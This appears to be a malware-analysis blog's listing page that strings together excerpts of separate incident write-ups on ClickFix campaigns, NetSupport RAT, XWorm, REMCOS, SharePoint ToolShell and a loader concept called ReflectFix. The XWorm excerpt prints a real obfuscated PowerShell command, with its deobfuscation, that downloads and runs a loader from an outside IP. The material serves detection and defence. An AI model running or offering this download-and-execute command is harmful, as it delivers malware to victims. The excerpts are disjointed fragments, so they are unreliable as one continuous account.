ClickFix - NetSupport RAT

Incident Overview

On Saturday, Spetember 20th, 2025, A user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occured between the previous incidents and this current campaign.

Calendaromatic and Homoglyphs

I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.

The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to electron. It combines HTML, CSS, and JavaScript into a single webview 2 based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.

ClickFix - XWorm

NOTE: Quick and dirty upload of some notes from an XWorm sample.

Technical Analysis

The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.

The ClickFix domain copied the following code to the user’s clipboard:

POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"

# Deobfuscated

FUNCTION YES { 
    &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};

$FF='HSJDUFERIKFOLDJRKMOXSDH';

$DD=$FF[8]+$FF[7]+$FF[17]; #IRM

$SS=$FF[8]+$FF[6]+$FF[19]; #IEX

# IEX (IRM 77.83.207.225/x.jpg)

The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.

WSL Shenanigans

A fun thing about WSL 2, is that it is fully capable of calling windows native functions and binaries. It also has cron. Which opens the opportunity to do some interesting things to someone’s unattended device.

Take this MSHTA execution for example. It’s a simple SAPI call made in JavaSCript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straight forward way to do this.

Side note: This malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis will reflect the 07/30 analysis date. This is also a really lazy writeup.

Intro

The initial incident was observed by Point Wild’s Threat Intelligence team Report Here.

This report covers the analysis of the sample and attack chain. Check it out, it’s a good write up. However, from the publicly available reporting at the time of original analysis, there was no information on the injection of SndVol.exe as a method for loading the REMCOS payload.

ToolShell

Jump to updates

Note: This doesn’t add much to the reference article, but covers the events as we saw them.

Reference: SharePoint Under Siege

Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to serveral detections and blocks of an encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed the first signs of activity on the affected endpoint occurred on July 17th, at 04:54:50 CDT.

ReflectFix

ClickFix has been the hot topic for over a year now (see all the other ClickFix posts) and recently, FileFix has come out as well (Shout out to mr.d0x!). In the spirit of calling every social engineering malware delivery system a “"-Fix”, let me introduce you to “ReflectFix” - A reflective .Net loader that utilizes social engineering aspects to load a remote DLL via reflection loading. Much like ClickFix or FileFix, ReflectFix uses a social engineering page that copies a url to the victim’s clipboard and downloads a reflection based loader. When executed by the victim, this loader takes the last copied string out of the clipboard and downloads the contents to a byte array which is loaded and executed in memory.

Excerpts from a threat briefing on IRGC threat groups.

Ignore the TLP Amber, this is TLP Green.

Direct Link

ClickFix - The RAT that (almost) got away

Incident Overview

An initial alert came in as an incident on a protected host. This incident was given a score of 1.1/10 and the summary of the included events revolved around a detection of a known hash. One minute after this automated incident message, 4 high detections were created for the host. Three minutes after the first notification, a managed detection was sent, including comments from the EDR vendors’ managed response team.

ClickFix - An Overview

• Executive Summary
• Introduction
• Use and Popularization
• Malware Delivery Details
• Payload Functionality
• Detection Methods
• Remediation Tactics
• Supporting Data

Executive Summary

ClickFix is a malware distribution method that relies on social engineering tactics to trick victims into executing malicious commands via the Windows Run menu. This is done through a series of steps, starting with the impersonation of well-known identity verification solutions like Cloudflare or reCAPTCHA. Typically, a user will browse to a compromised domain that contains a JavaScript function that loads the “Fake Captcha” page. This fake page will be styled as a legitimate verification system, tricking the user into complying with the requested verification process. When the user clicks the “Verify” or similar checkbox, malicious code will be copied into the user’s clipboard. Additionally, a window will pop up, telling the user to press Windows key + R and Ctrl + V, pressing enter after the malicious code is copied. More often than not, the malicious code is an installer for a Remote Access Trojan (RAT) or an Infostealer.